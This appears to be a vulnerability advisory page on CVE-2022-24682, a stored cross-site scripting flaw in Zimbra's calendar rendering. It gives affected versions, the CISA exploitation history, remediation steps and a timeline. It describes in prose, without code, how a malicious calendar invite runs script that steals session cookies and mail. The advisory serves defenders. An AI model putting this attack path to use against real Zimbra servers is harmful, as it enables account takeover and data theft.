What is Zimbra Collaboration Suite?
Zimbra Collaboration Suite (ZCS) is an enterprise email, calendar, and collaboration platform used by government agencies, military organisations, academic institutions, and enterprises globally. Its Classic Web Client renders HTML email content and ICS calendar data directly in the user's browser — processing content from untrusted external senders in the context of an authenticated user session. Any JavaScript that executes in this context has full access to the session's authentication tokens, email archive, contacts, and calendar data.
CVE-2022-24682 is the first XSS vulnerability in the CISA Known Exploited Vulnerabilities catalog for Zimbra's Classic UI — the beginning of a pattern in which the same architectural weakness was exploited by different threat actors year after year through 2026.
Overview
CVE-2022-24682 is a stored cross-site scripting (XSS) vulnerability in the Calendar feature of Zimbra Collaboration Suite 8.8.x. The Classic Web Client fails to properly escape HTML placed inside calendar element attributes — allowing an attacker to inject arbitrary JavaScript into the calendar, which executes when a victim opens or previews the calendar item in their authenticated Zimbra session.
Affected Versions
| Status | Zimbra ZCS Version |
|---|---|
| Vulnerable | ZCS 8.8.x prior to 8.8.15 Patch 30 (Update 1) |
| Fixed | ZCS 8.8.15 Patch 30 (Update 1) and later |
Technical Details
The vulnerability exists in the Calendar feature of the Zimbra Classic Web Client. When Zimbra processes and renders calendar event data, user-supplied content embedded within HTML element attributes is not properly encoded before being inserted into the document. The HTML markup containing the attacker's payload becomes unescaped, injecting arbitrary HTML — including executable JavaScript — into the page.
Attack characteristics:
- Authentication required: No — the malicious calendar item can be sent by any external email sender
- User interaction: Required — victim must open or preview the calendar item in the Classic Web Client
- Execution context: Authenticated Zimbra session — attacker's script has access to the session's cookies, email data, and contacts
The attack delivers a malicious calendar invitation to the victim's Zimbra inbox. When the victim opens or previews the item in the Classic Web Client, the injected JavaScript executes. Observed post-exploitation actions include theft of session cookies, email contents, and attachments.
Discovery
CVE-2022-24682 was reported to Zimbra by Volexity researchers on February 3, 2022. Zimbra issued a fix the following day — February 4, 2022 — and CISA added the CVE to the KEV catalog three weeks later on February 25. The NVD notes that exploitation was observed in the wild starting December 2021, approximately six weeks before the vulnerability was formally reported, indicating a zero-day exploitation window.
Exploitation Context
CVE-2022-24682 was one of several Zimbra CVEs actively exploited in early-to-mid 2022, documented in CISA/MS-ISAC advisory AA22-228A. The advisory notes that malicious actors were exploiting the vulnerability to steal Zimbra session cookie files — providing persistent authenticated access to victims' webmail without requiring their passwords.
CISA's ransomware flag indicates that CVE-2022-24682 was exploited not only for intelligence collection but as an initial access vector in ransomware operations — consistent with the pattern across the broader Zimbra KEV cluster, where the same webmail exposure attracted both state-sponsored intelligence actors and opportunistic financially motivated attackers.
Remediation
- Upgrade to ZCS 8.8.15 Patch 30 (Update 1) or later. The fix escapes HTML element attributes in calendar event rendering, preventing injection.
- Review session activity for users whose accounts may have received calendar invitations from external senders during the December 2021–February 2022 exposure window. Look for unexpected authenticated API calls, email forwarding rules created, or bulk email access.
- Invalidate active sessions for potentially affected users to force re-authentication after patching, removing any stolen but still-valid session cookies.
- Monitor for ICS/calendar invitation delivery from unknown external senders as an ongoing detection signal for calendar-based XSS attacks.
Key Details
| Property | Value |
|---|---|
| CVE ID | CVE-2022-24682 |
| Vendor / Product | Synacor — Zimbra Collaborate Suite (ZCS) |
| NVD Published | 2022-02-09 |
| NVD Last Modified | 2025-11-04 |
| CVSS 3.1 Score | 6.1 |
| CVSS 3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
| Severity | MEDIUM |
| CWE | CWE-116 — Improper Encoding or Escaping of Output |
| CISA KEV Added | 2022-02-25 |
| CISA KEV Deadline | 2022-03-11 |
| Known Ransomware Use | ⚠️ Yes |
CVSS 3.1 Breakdown
Required Action
Timeline
| Date | Event |
|---|---|
| 2021-12-01 | Active exploitation observed in the wild (NVD: 'as exploited in the wild starting in December 2021') |
| 2022-02-03 | Vulnerability reported to Zimbra by Volexity researchers |
| 2022-02-04 | Zimbra releases fix: ZCS 8.8.15 Patch 30 (Update 1) |
| 2022-02-25 | Added to CISA Known Exploited Vulnerabilities catalog |
| 2022-03-11 | CISA BOD 22-01 remediation deadline |
References
| Resource | Type |
|---|---|
| NVD — CVE-2022-24682 | Vulnerability Database |
| Zimbra Security Center | Vendor Advisory / Patch |
| CISA/MS-ISAC Advisory AA22-228A — Threat Actors Exploiting Multiple CVEs Against Zimbra Collaboration Suite | US Government |
| CISA KEV Catalog Entry | US Government |
| CISA BOD 22-01 | Remediation Directive |
| CWE-116 — Improper Encoding or Escaping of Output | Weakness Classification |